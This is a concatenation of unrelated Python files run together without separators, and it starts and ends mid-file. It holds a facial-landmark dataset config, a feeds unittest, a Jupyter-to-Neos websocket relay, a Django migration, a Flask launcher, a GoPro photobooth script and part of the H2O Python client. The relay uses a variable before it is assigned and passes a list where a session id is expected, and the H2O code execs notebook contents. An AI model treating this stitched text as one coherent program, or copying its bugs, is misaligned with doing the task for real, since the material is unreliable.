# image rotation param beta = 0.3 # shear transform param kptNum = 98 datasetSize = {'train':7500, 'test':2500, 'largepose':326, 'expression':314, 'blur':773, 'illumination':698, 'makeup':206, 'occlusion':736, 'all':10000 } flipRelation = [ [0, 32], [1, 31], [2, 30], [3, 29], [4, 28], [5, 27], [6, 26], [7, 25], [8, 24], [9, 23], [10, 22], [11, 21], [12, 20], [13, 19], [14, 18], [15, 17], [16, 16], [17, 15], [18, 14], [19, 13], [20, 12], [21, 11], [22, 10], [23, 9], [24, 8], [25, 7], [26, 6], [27, 5], [28, 4], [29, 3], [30, 2], [31, 1], [32, 0], [33, 46], [34, 45], [35, 44], [36, 43], [37, 42], [38, 50], [39, 49], [40, 48], [41, 47], [42, 37], [43, 36], [44, 35], [45, 34], [46, 33], [47, 41], [48, 40], [49, 39], [50, 38], [51, 51], [52, 52], [53, 53], [54, 54], [55, 59], [56, 58], [57, 57], [58, 56], [59, 55], [60, 72], [61, 71], [62, 70], [63, 69], [64, 68], [65, 75], [66, 74], [67, 73], [68, 64], [69, 63], [70, 62], [71, 61], [72, 60], [73, 67], [74, 66], [75, 65], [76, 82], [77, 81], [78, 80], [79, 79], [80, 78], [81, 77], [82, 76], [83, 87], [84, 86], [85, 85], [86, 84], [87, 83], [88, 92], [89, 91], [90, 90], [91, 89], [92, 88], [93, 95], [94, 94], [95, 93], [96, 97], [97, 96] ] """Tests for feeds utility.""" import unittest import feeds import xml.dom.minidom class FeedsTestCase(unittest.TestCase): def testHub(self): feed = xml.dom.minidom.parseString(open('feedstest.xml').read()) hub = feeds.get_hub(feed.getElementsByTagName('feed')[0]) # This should be the hub for the given feed. self.assertEqual(hub, 'http://pubsubhubbub.appspot.com/') def testSelf(self): feed = xml.dom.minidom.parseString(open('feedstest.xml').read()) self_href = feeds.get_self(feed.getElementsByTagName('feed')[0]) # This should be the hub for the given feed. self.assertEqual(self_href, 'http://feeds.feedburner.com/blogspot/MKuf') if __name__ == '__main__': unittest.main() ''' Middleware server to make Jupyter API messages nicer to deal with in Neos. When Neos gets better at parsing JSON, this may not be necessary, and should be removed for the real-time messages of nepcomm anyway, to reduce latency! see nepcomm for placeholder We can keep this for dealing with the less frequent Jupyter messages which are not dealing with real-time interactivity things like execute_requests, error responses, stdout, opening notebooks, etc. I think there are also some APIs in the ipywidgets library that are designed for some of the stuff we do here. But well, the way we are doing works well so welp. 
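As a rough guide to the plain-text protocol handled below (inferred from the handlers in main(), not a formal spec): messages arriving from Neos look like "cell/<cellid>/<code>", "updateVar/<data>" or "kernel/interrupt", while messages relayed back to Neos look like "cell/<cellid>/<text>" for kernel output and errors, or "media/<cellid>/<url>" for media produced through the comm channel.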
''' import asyncio import websockets import requests import nest_asyncio nest_asyncio.apply() import uuid, datetime import json import time def send_execute_request(code,session_id=None): session_id = uuid.uuid1().hex if session_id is None else session_id msg_type = 'execute_request' id=uuid.uuid1().hex content = { 'code' : code, 'silent':False } hdr = { 'msg_id' : id, 'username': 'username', 'session': session_id, 'data': datetime.datetime.now().isoformat(), 'msg_type': msg_type, 'version' : '5.3' } msg = { 'header': hdr, 'msg_id': id, 'parent_header': hdr, 'metadata': {}, 'channel': 'shell', 'content': content } return msg def send_kernel_interrupt(session_id=None): session_id = uuid.uuid1().hex if session_id is None else session_id msg_type = 'kernel_interrupt' id=uuid.uuid1().hex hdr = { 'msg_id' : id, 'username': 'username', 'session': session_id, 'data': datetime.datetime.now().isoformat(), 'msg_type': msg_type, 'version' : '5.3' } msg = { 'header': hdr, 'msg_id': id, 'parent_header': hdr, 'metadata': {}, 'channel': 'shell', 'content': {} } return msg def send_comm(data,comm_id,session_id): msg_type = 'comm_msg' id=uuid.uuid1().hex hdr = { 'msg_id' : id, 'username': 'username', 'session': session_id, 'data': datetime.datetime.now().isoformat(), 'msg_type': msg_type, 'version' : '5.3' } content = {'comm_id': comm_id, 'data': data } msg = { 'header': hdr, 'msg_id': id, 'parent_header': hdr, 'metadata': {}, 'buffers':[], 'channel':"shell", 'content': content } return msg def main(kernel_id,headers,comm_id): async def loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids): while 1: print("awaiting jupyter response") response = await websocket.recv() # print(response) response = json.loads(response) session_ids[0] = response["header"]["session"] if response["msg_type"] == "comm_msg": if parent_msg_id in neos_cell_msg_ids: cellid = neos_cell_msg_ids[parent_msg_id] else: cellid="0" msg = response["content"]["data"] i = msg.index("/") # print("HIIIIIIIIIIIII",i) if i == -1: await neossocket.send(str(msg)) else: message_type = msg[:i] if message_type == "media": media_url = msg[i+1:] await neossocket.send("media/"+cellid+"/"+media_url) else: await neossocket.send(str(msg)) else: try: parent_msg_id = response["parent_header"]["msg_id"] if parent_msg_id in neos_cell_msg_ids: cellid = neos_cell_msg_ids[parent_msg_id] else: cellid="0" if response["msg_type"] == "stream": await neossocket.send("cell/"+cellid+"/"+response["content"]["text"]) if response["msg_type"] == "error": await neossocket.send("cell/"+cellid+"/"+""+response["content"]["ename"]+": "+response["content"]["evalue"]+"") elif response["msg_type"] == "execute_result": await neossocket.send("cell/"+cellid+"/"+response["content"]["data"]["text/plain"]) #TODO: treat execute_response differently too elif response["msg_type"] == "status": if response["content"]["execution_state"] == "idle": if parent_msg_id in neos_cell_msg_ids: del neos_cell_msg_ids[parent_msg_id] except: pass async def loop2(websocket,neossocket,path,session_ids,neos_cell_msg_ids): while 1: session_id = session_ids[0] print("awaiting neos instruction") msg = await neossocket.recv() # print(msg) i = msg.index("/") msg_type = msg[:i] msg_content = msg[i+1:] if msg_type == "updateVar": #update variable await websocket.send(json.dumps(send_comm(msg_content,comm_id,session_id))) elif msg_type == "cell": #execute code j = msg_content.index("/") cellid = msg_content[:j] code = msg_content[j+1:] message = send_execute_request(code,session_id) 
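# Record which Neos cell issued this execute_request so that loop1 can route the kernel's
# replies (stream, error, execute_result) back to that cell via the reply's parent_header msg_id.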
neos_cell_msg_ids[message["msg_id"]] = cellid message_str = json.dumps(message) # print(message_str) await websocket.send(message_str) elif msg_type == "kernel": if msg_content == "interrupt": await websocket.send(json.dumps(send_kernel_interrupt(session_ids))) # async def loop3(neossocket2,path): # async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel["id"]+"/channels",extra_headers=headers) as websocket: # await websocket.send(json.dumps(send_execute_request(""))) # priming # nonlocal session_id # while 1: # print("awaiting neos kernel instruction") # msg = await neossocket.recv() # print(msg) # i = msg.index("/") # msg_type = msg[:i] # msg_content = msg[i+1:] # if msg_type == "kernel": # if msg_content == "interrupt": # await websocket.send(json.dumps(send_kernel_interrupt(session_id))) async def func(neossocket,path): session_ids=[""] neos_cell_msg_ids = {} # async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel["id"]+"/channels",extra_headers=headers) as websocket: async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel_id+"/channels",extra_headers=headers) as websocket: await websocket.send(json.dumps(send_execute_request(""))) # priming task1 = asyncio.create_task(loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids)) task2 = asyncio.create_task(loop2(websocket,neossocket,path,session_ids,neos_cell_msg_ids)) # await task1 await task2 return func def set_up_nep_internal(kernel_id,headers): async def func(): session_ids=[""] neos_cell_msg_ids = {} # async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel["id"]+"/channels",extra_headers=headers) as websocket: async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel_id+"/channels",extra_headers=headers) as websocket: await websocket.send(json.dumps(send_execute_request(""))) # priming # await websocket.send(json.dumps(send_execute_request('import os'))) # await websocket.send(json.dumps(send_execute_request('os.write(1, b"text\n")'))) response = await websocket.recv() response = json.loads(response) session_ids[0] = response["header"]["session"] # async for i in range(100): # while 1: # async def loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids): # code = "\n".join(['from Neptune import Nep','nep = Nep()', 'nep.start()']) await websocket.send(json.dumps(send_execute_request("from neptune import Nep", session_ids[0]))) await websocket.send(json.dumps(send_execute_request("nep=Nep()", session_ids[0]))) await websocket.send(json.dumps(send_execute_request("nep.start()", session_ids[0]))) # code = "10000000000000000+10000000000000000000" # await websocket.send(json.dumps(send_execute_request(code, session_ids[0]))) response = await websocket.recv() print(response) # code = "10000000000000000+10000000000000000000" # await websocket.send(json.dumps(send_execute_request(code, session_ids[0]))) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) # task1 = asyncio.create_task(loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids)) # await task1 # await task2 return func def set_up_nep(kernel_id,auth_token,ws_port): headers = {'Authorization': 
auth_token} loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) # start_server = websockets.serve(set_up_nep_internal(kernel_id,headers), "localhost", ws_port) loop.run_until_complete(set_up_nep_internal(kernel_id,headers)()) # loop.run_forever() def run_server_from_id(comm_id,kernel_id,auth_token,ws_port): headers = {'Authorization': auth_token} loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) start_server = websockets.serve(main(kernel_id,headers, comm_id), "localhost", ws_port) loop.run_until_complete(start_server) loop.run_forever() def run_server(comm_id, base, notebook_path, auth_token, ws_port): headers = {'Authorization': auth_token} url = base + '/api/kernels' response = requests.get(url,headers=headers) kernels = json.loads(response.text) print(kernels) kernel = kernels[0] # if len(kernels) == 0: # kernel = start_kernel(base,auth_token) # else: # kernel = kernels[0] # loop = asyncio.get_event_loop() loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) start_server = websockets.serve(main(kernel["id"],headers, comm_id), "localhost", ws_port) loop.run_until_complete(start_server) loop.run_forever() def start_kernel(base,auth_token): headers = {'Authorization': auth_token} url = base + '/api/kernels' # response = requests.get(url,headers=headers) # kernels = json.loads(response.text) # print(kernels) data = {"name": "python3"}#, "path": "/"} response = requests.post(url,headers=headers)#, data = data) kernel = json.loads(response.text) print(kernel) return kernel TheDjangoBoys/Gymkhana-Nominationsnomi/migrations/0122_auto_20170805_1217.py # -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-08-05 12:17 from __future__ import unicode_literals from django.db import migrations, models import nomi.models class Migration(migrations.Migration): dependencies = [ ('nomi', '0121_auto_20170805_1213'), ] operations = [ migrations.AlterField( model_name='posthistory', name='end', field=models.DateField(blank=True, default=nomi.models.default_end_date), ), ] from app import create_app import os config_name = os.getenv("FLASK_ENV") app = create_app() if __name__ == '__main__': app.run(debug=True)photobooth.py from datetime import datetime import time, os, subprocess, platform from goprocam import GoProCamera, constants # https://pypi.org/project/goprocam/ import keyboard #https://pypi.org/project/keyboard/ import pyqrcode # https://pypi.org/project/PyQRCode/ import png # https://pypi.org/project/pypng/ import ffmpeg # https://pypi.org/project/ffmpeg-python/ class PhotoBooth(object): def __init__(self, outputPath = "goProVids", videoLength = 3, settings = ("1080p","120"), baseURL = "localhost"): try: os.mkdir(outputPath) print('created output folder' , outputPath) except FileExistsError: print("Directory ", outputPath, " will be used for video output") self.videoLength = videoLength self.settings = settings self.outputPath = outputPath self.baseURL = baseURL # the user-facing website self.lastVideo = None # the last video taken by the booth self.processedVideo = None self.qr = None # now try to connect to the camera. 
self.gpCam = self.connectCamera() def connectCamera(self): theCamera = None keepTrying = True while (not theCamera and keepTrying): print ("Attempting to connect to the camera.") if (keepTrying): try: theCamera = GoProCamera.GoPro() theCamera.video_settings = self.settings # protune turns on more controls on the camera theCamera.gpControlSet(constants.Video.PROTUNE_VIDEO, constants.Video.ProTune.ON) # sync the time of the camera to the computer theCamera.syncTime() except: print("problem connecting to the camera. Check your network settings") keepTrying = input("Do you want to try again? ").lower() == "y" theCamera = None return theCamera def takeVideo(self): now = datetime.now() videoName = '{:04d}-{:02d}-{:02d}_{:02d}-{:02d}-{:02d}.MP4'.format(now.year, now.month, now.day, now.hour, now.minute, now.second) print("Recording. ") try: self.gpCam.shoot_video(self.videoLength) self.lastVideo = videoName except: self.lastVideo = None def downloadVideo(self): print("downloading shot") self.gpCam.downloadLastMedia(path='', custom_filename=os.path.join(self.outputPath, self.lastVideo)) def processVideo(self): # this appends the QR code to the end of the video, just as a proof of concept. # a more complicated ffmpeg script could overlay a MV watermark, add titles and end screens etc. videoFilePath = os.path.join(self.outputPath, self.lastVideo) processedVideoName = self.lastVideo.rsplit(".", 1)[0]+"_processed.MP4" processedVideoPath = os.path.join(self.outputPath, processedVideoName) qrCodePath = os.path.join(self.outputPath, self.lastVideo + ".png") # I've used this ffmpeg module to wrap the processing script for python, but I think it would be simpler to write # the processing script in "pure" ffmpeg, and call it using the shell try: v1 = (ffmpeg .input(videoFilePath, r=25) ) v2 = (ffmpeg .input(qrCodePath, loop=1, t=2, r=25) .filter("scale", "1920/1080") ) c = ffmpeg.concat(v1, v2).output(processedVideoPath, pix_fmt="yuv420p") c.run() self.processedVideo = processedVideoName except: print("error processing video") self.processedVideo = None def playVideo(self): videoFilePath = None if self.processedVideo: # depending on the platform we can use openCV or a thrird party player like omxplayer on Raspberry Pi videoFilePath = os.path.join(self.outputPath, self.processedVideo) elif self.lastVideo: videoFilePath = os.path.join(self.outputPath, self.lastVideo) if videoFilePath: if platform.system() == 'Darwin': # macOS subprocess.call(('open', videoFilePath)) elif platform.system() == 'Windows': # Windows os.startfile(videoFilePath) else: # linux variants subprocess.call(('xdg-open', videoFilePath)) else: print("No video to play") def makeQR(self): qrText = "http://" + '/'.join((self.baseURL, self.outputPath, self.lastVideo)) self.qr = pyqrcode.create(qrText) def saveQR(self): self.qr.png(os.path.join (self.outputPath, self.lastVideo + ".png"), scale =6) def showQR(self): self.makeQR() self.qr.show() def countDown(self): # do fancy countdown shenannigans here, or… for i in range(3, 0, -1): print(i) time.sleep(1) def newPhotoBoothSession(self): if (self.gpCam): print ("press spacebar to start") keyboard.wait(" ") # wait for spacebar - use GPIO etc self.countDown() self.takeVideo() self.downloadVideo() self.processVideo() self.playVideo() self.showQR()""" This module provides all of the top level calls for models and various data transform methods. 
By simply """ import os import os.path import re import urllib import urllib2 import json import imp import random import tabulate from connection import H2OConnection from job import H2OJob from expr import ExprNode from frame import H2OFrame, _py_tmp_key from model import H2OBinomialModel,H2OAutoEncoderModel,H2OClusteringModel,H2OMultinomialModel,H2ORegressionModel import h2o_model_builder def import_file(path): """ Import a single file or collection of files. :param path: A path to a data file (remote or local). :return: A new H2OFrame """ paths = [path] if isinstance(path,str) else path return [ _import1(fname) for fname in paths ] def _import1(path): j = H2OConnection.get_json(url_suffix="ImportFiles", path=path) if j['fails']: raise ValueError("ImportFiles of " + path + " failed on " + j['fails']) return j['destination_frames'][0] def upload_file(path, destination_frame=""): """ Upload a dataset at the path given from the local machine to the H2O cluster. :param path: A path specifying the location of the data to upload. :param destination_frame: The name of the H2O Frame in the H2O Cluster. :return: A new H2OFrame """ fui = {"file": os.path.abspath(path)} destination_frame = _py_tmp_key() if destination_frame == "" else destination_frame H2OConnection.post_json(url_suffix="PostFile", file_upload_info=fui,destination_frame=destination_frame) return H2OFrame(raw_id=destination_frame) def import_frame(path=None): """ Import a frame from a file (remote or local machine). If you run H2O on Hadoop, you can access to HDFS :param path: A path specifying the location of the data to import. :return: A new H2OFrame """ return H2OFrame(file_path=path) def parse_setup(raw_frames): """ :param raw_frames: A collection of imported file frames :return: A ParseSetup "object" """ # The H2O backend only accepts things that are quoted if isinstance(raw_frames, unicode): raw_frames = [raw_frames] j = H2OConnection.post_json(url_suffix="ParseSetup", source_frames=[_quoted(id) for id in raw_frames]) return j def parse(setup, h2o_name, first_line_is_header=(-1, 0, 1)): """ Trigger a parse; blocking; removeFrame just keep the Vecs. :param setup: The result of calling parse_setup. :param h2o_name: The name of the H2O Frame on the back end. :param first_line_is_header: -1 means data, 0 means guess, 1 means header. 
:return: A new parsed object """ # Parse parameters (None values provided by setup) p = { 'destination_frame' : h2o_name, 'parse_type' : None, 'separator' : None, 'single_quotes' : None, 'check_header' : None, 'number_columns' : None, 'chunk_size' : None, 'delete_on_done' : True, 'blocking' : False, } if isinstance(first_line_is_header, tuple): first_line_is_header = setup["check_header"] if setup["column_names"]: setup["column_names"] = [_quoted(name) for name in setup["column_names"]] p["column_names"] = None if setup["column_types"]: setup["column_types"] = [_quoted(name) for name in setup["column_types"]] p["column_types"] = None if setup["na_strings"]: setup["na_strings"] = [[_quoted(na) for na in col] if col is not None else [] for col in setup["na_strings"]] p["na_strings"] = None # update the parse parameters with the parse_setup values p.update({k: v for k, v in setup.iteritems() if k in p}) p["check_header"] = first_line_is_header # Extract only 'name' from each src in the array of srcs p['source_frames'] = [_quoted(src['name']) for src in setup['source_frames']] # Request blocking parse j = H2OJob(H2OConnection.post_json(url_suffix="Parse", **p), "Parse").poll() return j.jobs def parse_raw(setup, id=None, first_line_is_header=(-1,0,1)): """ Used in conjunction with import_file and parse_setup in order to make alterations before parsing. :param setup: Result of h2o.parse_setup :param id: An optional id for the frame. :param first_line_is_header: -1,0,1 if the first line is to be used as the header :return: An H2OFrame object """ id = setup["destination_frame"] fr = H2OFrame() parsed = parse(setup, id, first_line_is_header) fr._nrows = parsed['rows'] fr._col_names = parsed['column_names'] fr._ncols = len(fr._col_names) fr._computed = True fr._id = id return fr def _quoted(key): if key == None: return "\"\"" is_quoted = len(re.findall(r'\"(.+?)\"', key)) != 0 key = key if is_quoted else "\"" + key + "\"" return key def assign(data,id): rapids(ExprNode(",", ExprNode("gput", id, data), ExprNode("removeframe", data))._eager()) data._id = id return data def which(condition): """ :param condition: A conditional statement. :return: A H2OFrame of 1 column filled with 0-based indices for which the condition is True """ return H2OFrame(expr=ExprNode("h2o.which",condition,False))._frame() def ifelse(test,yes,no): """ Semantically equivalent to R's ifelse. Based on the booleans in the test vector, the output has the values of the yes and no vectors interleaved (or merged together). :param test: A "test" H2OFrame :param yes: A "yes" H2OFrame :param no: A "no" H2OFrame :return: An H2OFrame """ return H2OFrame(expr=ExprNode("ifelse",test,yes,no))._frame() def get_future_model(future_model): """ Waits for the future model to finish building, and then returns the model. :param future_model: an H2OModelFuture object :return: a resolved model (i.e. an H2OBinomialModel, H2ORegressionModel, H2OMultinomialModel, ...) 
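A sketched usage, assuming a non-blocking build started with start_glm_job() from this module (x and y stand for predictor and response frames; the GLM arguments are illustrative):

>>> future = start_glm_job(x, y, family="binomial")
>>> model = get_future_model(future)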
""" return h2o_model_builder._resolve_model(future_model) def get_model(model_id): """ Return the specified model :param model_id: The model identification in h2o """ model_json = H2OConnection.get_json("Models/"+model_id)["models"][0] model_type = model_json["output"]["model_category"] if model_type=="Binomial": return H2OBinomialModel(model_id, model_json) elif model_type=="Clustering": return H2OClusteringModel(model_id, model_json) elif model_type=="Regression": return H2ORegressionModel(model_id, model_json) elif model_type=="Multinomial": return H2OMultinomialModel(model_id, model_json) elif model_type=="AutoEncoder": return H2OAutoEncoderModel(model_id, model_json) else: raise NotImplementedError(model_type) def get_frame(frame_id): """ Obtain a handle to the frame in H2O with the frame_id key. :return: An H2OFrame """ return H2OFrame.get_frame(frame_id) """ Here are some testing utilities for running the pyunit tests in conjunction with run.py. run.py issues an ip and port as a string: ":". The expected value of sys_args[1] is ":" """ """ All tests MUST have the following structure: import sys sys.path.insert(1, "..") # may vary depending on this test's position relative to h2o-py import h2o def my_test(ip=None, port=None): ...test filling... if __name__ == "__main__": h2o.run_test(sys.argv, my_test) So each test must have an ip and port """ # TODO/FIXME: need to create an internal testing framework for python ... internal IP addresses should NOT be published as part of package! # HDFS helpers def get_h2o_internal_hdfs_name_node(): return "172.16.2.176" def is_running_internal_to_h2o(): url = "http://{0}:50070".format(get_h2o_internal_hdfs_name_node()) try: urllib2.urlopen(urllib2.Request(url)) internal = True except: internal = False return internal def check_models(model1, model2, use_cross_validation=False, op='e'): """ Check that the given models are equivalent :param model1: :param model2: :param use_cross_validation: boolean. if True, use validation metrics to determine model equality. Otherwise, use training metrics. :param op: comparison operator to use. 'e':==, 'g':>, 'ge':>= :return: None. Throw meaningful error messages if the check fails """ # 1. Check model types model1_type = type(model1) model2_type = type(model2) assert model1_type == model2_type, "The model types differ. The first model is of type {0} and the second " \ "models is of type {1}.".format(model1_type, model2_type) # 2. Check model metrics if isinstance(model1,H2OBinomialModel): # 2a. Binomial # F1 f1_1 = model1.F1(xval=use_cross_validation) f1_2 = model2.F1(xval=use_cross_validation) if op == 'e': assert f1_1[0][1] == f1_2[0][1], "The first model has an F1 of {0} and the second model has an F1 of " \ "{1}. Expected the first to be == to the second.".format(f1_1[0][1], f1_2[0][1]) elif op == 'g': assert f1_1[0][1] > f1_2[0][1], "The first model has an F1 of {0} and the second model has an F1 of " \ "{1}. Expected the first to be > than the second.".format(f1_1[0][1], f1_2[0][1]) elif op == 'ge': assert f1_1[0][1] >= f1_2[0][1], "The first model has an F1 of {0} and the second model has an F1 of " \ "{1}. Expected the first to be >= than the second.".format(f1_1[0][1], f1_2[0][1]) elif isinstance(model1,H2ORegressionModel): # 2b. Regression # MSE mse1 = model1.mse(xval=use_cross_validation) mse2 = model2.mse(xval=use_cross_validation) if op == 'e': assert mse1 == mse2, "The first model has an MSE of {0} and the second model has an MSE of " \ "{1}. 
Expected the first to be == to the second.".format(mse1, mse2) elif op == 'g': assert mse1 > mse2, "The first model has an MSE of {0} and the second model has an MSE of " \ "{1}. Expected the first to be > than the second.".format(mse1, mse2) elif op == 'ge': assert mse1 >= mse2, "The first model has an MSE of {0} and the second model has an MSE of " \ "{1}. Expected the first to be >= than the second.".format(mse1, mse2) elif isinstance(model1,H2OMultinomialModel): # 2c. Multinomial # hit-ratio pass elif isinstance(model1,H2OClusteringModel): # 2d. Clustering # totss totss1 = model1.totss(xval=use_cross_validation) totss2 = model2.totss(xval=use_cross_validation) if op == 'e': assert totss1 == totss2, "The first model has an TOTSS of {0} and the second model has an " \ "TOTSS of {1}. Expected the first to be == to the second.".format(totss1, totss2) elif op == 'g': assert totss1 > totss2, "The first model has an TOTSS of {0} and the second model has an " \ "TOTSS of {1}. Expected the first to be > than the second.".format(totss1, totss2) elif op == 'ge': assert totss1 >= totss2, "The first model has an TOTSS of {0} and the second model has an " \ "TOTSS of {1}. Expected the first to be >= than the second." \ "".format(totss1, totss2) def check_dims_values(python_obj, h2o_frame, rows, cols): """ Check that the dimensions and values of the python object and H2OFrame are equivalent. Assumes that the python object conforms to the rules specified in the h2o frame documentation. :param python_obj: a (nested) list, tuple, dictionary, numpy.ndarray, ,or pandas.DataFrame :param h2o_frame: an H2OFrame :param rows: number of rows :param cols: number of columns :return: None """ h2o_rows, h2o_cols = h2o_frame.dim() assert h2o_rows == rows and h2o_cols == cols, "failed dim check! h2o_rows:{0} rows:{1} h2o_cols:{2} cols:{3}" \ "".format(h2o_rows, rows, h2o_cols, cols) if isinstance(python_obj, (list, tuple)): for r in range(rows): for c in range(cols): pval = python_obj[r][c] if rows > 1 else python_obj[c] hval = h2o_frame[r,c] assert pval == hval, "expected H2OFrame to have the same values as the python object for row {0} and column " \ "{1}, but h2o got {2} and python got {3}.".format(r, c, hval, pval) elif isinstance(python_obj, dict): for r in range(rows): for k in python_obj.keys(): pval = python_obj[k][r] if hasattr(python_obj[k],'__iter__') else python_obj[k] hval = h2o_frame[r,k] assert pval == hval, "expected H2OFrame to have the same values as the python object for row {0} and column " \ "{1}, but h2o got {2} and python got {3}.".format(r, k, hval, pval) def np_comparison_check(h2o_data, np_data, num_elements): """ Check values achieved by h2o against values achieved by numpy :param h2o_data: an H2OFrame or H2OVec :param np_data: a numpy array :param num_elements: number of elements to compare :return: None """ # Check for numpy try: imp.find_module('numpy') except ImportError: assert False, "failed comparison check because unable to import numpy" import numpy as np rows, cols = h2o_data.dim() for i in range(num_elements): r = random.randint(0,rows-1) c = random.randint(0,cols-1) h2o_val = h2o_data[r,c] if isinstance(h2o_data,H2OFrame) else h2o_data[r] np_val = np_data[r,c] if len(np_data.shape) > 1 else np_data[r] if isinstance(np_val, np.bool_): np_val = bool(np_val) # numpy haz special bool type :( assert np.absolute(h2o_val - np_val) < 1e-6, \ "failed comparison check! 
h2o computed {0} and numpy computed {1}".format(h2o_val, np_val) def run_test(sys_args, test_to_run): # import pkg_resources # ver = pkg_resources.get_distribution("h2o").version # print "H2O PYTHON PACKAGE VERSION: " + str(ver) ip, port = sys_args[2].split(":") init(ip,port) log_and_echo("------------------------------------------------------------") log_and_echo("") log_and_echo("STARTING TEST: "+str(ou())) log_and_echo("") log_and_echo("------------------------------------------------------------") num_keys = store_size() test_to_run(ip, port) if keys_leaked(num_keys): print "Leaked Keys!" def ou(): """ Where is my baguette!? :return: the name of the baguette. oh uhr uhr huhr """ from inspect import stack return stack()[2][1] def log_and_echo(message): """ Log a message on the server-side logs This is helpful when running several pieces of work one after the other on a single H2O cluster and you want to make a notation in the H2O server side log where one piece of work ends and the next piece of work begins. Sends a message to H2O for logging. Generally used for debugging purposes. :param message: A character string with the message to write to the log. :return: None """ if message is None: message = "" H2OConnection.post_json("LogAndEcho", message=message) def ipy_notebook_exec(path,save_and_norun=False): notebook = json.load(open(path)) program = '' for block in ipy_blocks(notebook): for line in ipy_lines(block): if "h2o.init" not in line: program += line if '\n' in line else line + '\n' if save_and_norun: with open(os.path.basename(path).split('ipynb')[0]+'py',"w") as f: f.write(program) else: d={} exec program in d # safe, but horrible (exec is horrible) def ipy_blocks(notebook): if 'worksheets' in notebook.keys(): return notebook['worksheets'][0]['cells'] # just take the first worksheet elif 'cells' in notebook.keys(): return notebook['cells'] else: raise NotImplementedError, "ipython notebook cell/block json format not handled" def ipy_lines(block): if 'source' in block.keys(): return block['source'] elif 'input' in block.keys(): return block['input'] else: raise NotImplementedError, "ipython notebook source/line json format not handled" def remove(object): """ Remove object from H2O. This is a "hard" delete of the object. It removes all subparts. :param object: The object pointing to the object to be removed. :return: None """ if object is None: raise ValueError("remove with no object is not supported, for your protection") if isinstance(object, H2OFrame): H2OConnection.delete("DKV/"+object._id) if isinstance(object, str): H2OConnection.delete("DKV/"+object) def remove_all(): """ Remove all objects from H2O. :return None """ H2OConnection.delete("DKV") def removeFrameShallow(key): """ Do a shallow DKV remove of the frame (does not remove any internal Vecs). This is a "soft" delete. Just removes the top level pointer, but all big data remains! :param key: A Frame Key to be removed :return: None """ rapids("(removeframe '"+key+"')") return None def rapids(expr, id=None): """ Fire off a Rapids expression. :param expr: The rapids expression (ascii string). 
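:param id: (Optional) A key to assign the result to; when given, the expression is wrapped in an assignment to that key before being sent.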
:return: The JSON response of the Rapids execution """ if isinstance(expr, list): expr = ExprNode._collapse_sb(expr) expr = "(= !{} {})".format(id,expr) if id is not None else expr result = H2OConnection.post_json("Rapids", ast=urllib.quote(expr), _rest_version=99) if result['error'] is not None: raise EnvironmentError("rapids expression not evaluated: {0}".format(str(result['error']))) return result def ls(): """ List Keys on an H2O Cluster :return: Returns a list of keys in the current H2O instance """ return H2OFrame(expr=ExprNode("ls"))._frame().as_data_frame() def frame(frame_id, exclude=""): """ Retrieve metadata for a id that points to a Frame. :param frame_id: A pointer to a Frame in H2O. :return: Meta information on the frame """ return H2OConnection.get_json("Frames/" + urllib.quote(frame_id+exclude)) def frames(): """ Retrieve all the Frames. :return: Meta information on the frames """ return H2OConnection.get_json("Frames") def download_pojo(model,path=""): """ Download the POJO for this model to the directory specified by path (no trailing slash!). If path is "", then dump to screen. :param model: Retrieve this model's scoring POJO. :param path: An absolute path to the directory where POJO should be saved. :return: None """ java = H2OConnection.get( "Models.java/"+model._id ) file_path = path + "/" + model._id + ".java" if path == "": print java.text else: with open(file_path, 'w') as f: f.write(java.text) def download_csv(data, filename): """ Download an H2O data set to a CSV file on the local disk. Warning: Files located on the H2O server may be very large! Make sure you have enough hard drive space to accommodate the entire file. :param data: an H2OFrame object to be downloaded. :param filename:A string indicating the name that the CSV file should be should be saved to. :return: None """ if not isinstance(data, H2OFrame): raise(ValueError, "`data` argument must be an H2OFrame, but got " + type(data)) url = "http://{}:{}/3/DownloadDataset?frame_id={}".format(H2OConnection.ip(),H2OConnection.port(),data._id) with open(filename, 'w') as f: response = urllib2.urlopen(url) f.write(response.read()) f.close() def download_all_logs(dirname=".",filename=None): """ Download H2O Log Files to Disk :param dirname: (Optional) A character string indicating the directory that the log file should be saved in. :param filename: (Optional) A string indicating the name that the CSV file should be :return: path of logs written (as a string) """ url = 'http://' + H2OConnection.ip() + ':' + str(H2OConnection.port()) + '/Logs/download' response = urllib2.urlopen(url) if not os.path.exists(dirname): os.mkdir(dirname) if filename == None: for h in response.headers.headers: if 'filename=' in h: filename = h.split("filename=")[1].strip() break path = os.path.join(dirname,filename) with open(path, 'w') as f: response = urllib2.urlopen(url) f.write(response.read()) f.close() print "Writing H2O logs to " + path return path def save_model(model, dir="", name="", filename="", force=False): """ Save an H2O Model Object to Disk. In the case of existing files force = TRUE will overwrite the file. Otherwise, the operation will fail. :param dir: string indicating the directory the model will be written to. :param name: string name of the file. :param filename: full path to the file. 
